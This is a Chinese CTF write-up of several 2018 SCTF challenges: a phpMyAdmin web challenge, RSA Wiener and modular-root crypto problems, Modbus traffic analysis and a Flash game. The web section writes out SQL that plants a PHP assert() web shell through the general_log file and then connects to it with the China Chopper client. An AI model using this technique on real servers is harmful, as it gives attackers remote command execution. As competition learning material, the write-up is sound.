2018 SCTF 部分wp

编程入门 行业动态 更新时间:2024-10-28 02:26:31

弱弱的web狗表示简直就没有活路....

Web

easiest  web-phpmyadmin

参考这篇:地址

执行以下sql语句:

set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php';
SELECT '<?php assert($_POST["cmd"]);?>'

用菜刀连一下:


成功,找目录里文件,C盘有个flag.txt:



Crypto

it may contain flag

题目简单粗暴直接给了RSA的n,e,c 首先尝试一波分解n,分解出n此题就结束了

http://factordb/ 尝试分解,无果。

观察这个e竟然这么大,那就可能存在低解密指数攻击。 具体请参考这篇文章:https://www.anquanke/post/id/84632

这篇总结CTF中RSA攻击姿势很全面。

尝试低解密指数攻击,直接用Github上的源码跑就行(运行RSAwienerHacker.py就行,调用hack_RSA方法)


发现跑出了私钥d,所以直接解密就完了:

c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3
d=731297
n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf
m=pow(c,d,n)
print 'SCTF{'+hex(m)[2:len(hex(m))-1].decode('hex')+'}'

得到flag:



A Number Problem

更加简单粗暴 题目两行:

x**33=1926041757553905692219721422025224638913707 mod 3436415358139016629092568198745009225773259
tell me the smallest answer of x

解方程,解出x应该flag就出来了。

看到这个题,第一反应又考了一个RSA?

分解一波N发现可以分解,计算(p-1)*(q-1),然后计算私钥发现不对... e与n的欧拉值不互素,RSA条件不满足

不死心 想到今年HUMEN CTF有一道题也是不互素情况,直接拿11当e去算私钥最后结果开三次方,拿到结果美滋滋去交....

各种姿势交都不对....

把结果代入题目,发现根本就不对。。。

找问题 发现了开3次方失败了,也就是说不能正好开出三次方,这是近似值。

死心了 看来不是RSA

此时看题 才发现让我学习数论.... 粗心走的弯路啊

学数论解方程emmmmm(不适合小白)走一波工具 使用mathematica尝试求解

命令: solve[x^33==1926041757553905692219721422025224638913707,{x},Modulus->3436415358139016629092568198745009225773259]

解出x:(2333又偷出了一道题)


最小的结果是flag,将x转为字符串发现是乱码,直接交SCTF{x}就过了。

早点想起mathematics没准还能拿个前三2333(逃... 数论大佬别打我)


MISC

签到:

考手速。万年单身狗手速还是不行.... 感觉很快了还是才第十 严重怀疑前几是不是脚本跑的2333

神奇的ModBus:

流量分析,题目说modbus,查一下发现是个协议。流量包中有这个协议的流量,直接wireshark筛选出了modbus协议的包

追踪TCP流,发现整个TCP流都充斥着这个flag:


sctf{Easy_Mdbus} 直接去交发现不行

换了各种姿势 大小写 、点都试过了交了一万遍flag都不行mmp

简直了 还能有假flag 

研究了一会Modbus协议  盯着流量包盯了半天感觉什么东西都分析不出来了。。。

晚上吃过饭再交一下上面的flag成了.... 真是mmp 不知道题目平台验证flag的程序出了bug还是我有毒(心中cnm在奔腾)

肥宅快乐题:

开始打游戏... 是个flash 播放器打开能跳关的 既然通关就给flag那就快进到最后 发现对话里并没有flag

从头到尾跳帧翻 还是没有...

然后队里一个大佬翻到了flag2333(我有毒) 请教了发现md我的播放器有毒(辣鸡迅雷影音)平时不咋用电脑看视频的痛

换个Potplayer 翻到差不多57帧的时候 出现这个动画:


一直点击对话就得到了flag:


见识了见识了...


总结:

web完全做不动... 

建议板那道XSS成功弹框不知道干啥了.. 打cookie发现没有东西,有师傅发了wp才发现自己才踏出万里长征的第一步...

misc侧信道和神秘的交易 都是新知识 看来快速学习能力太差了...

Crypto 那道ELGamal 密码学刚讲这个 不知道有什么攻击姿势 感觉应该是同一flag用不同随机数加密了两次 把两对c1,c2给出了 但是不会用...

还是只会偷题的小白....坐等大手子各师傅们的wp学习一波...


更多推荐

2018 SCTF 部分wp

本文发布于:2023-06-13 21:46:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1408774.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:SCTF   wp

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!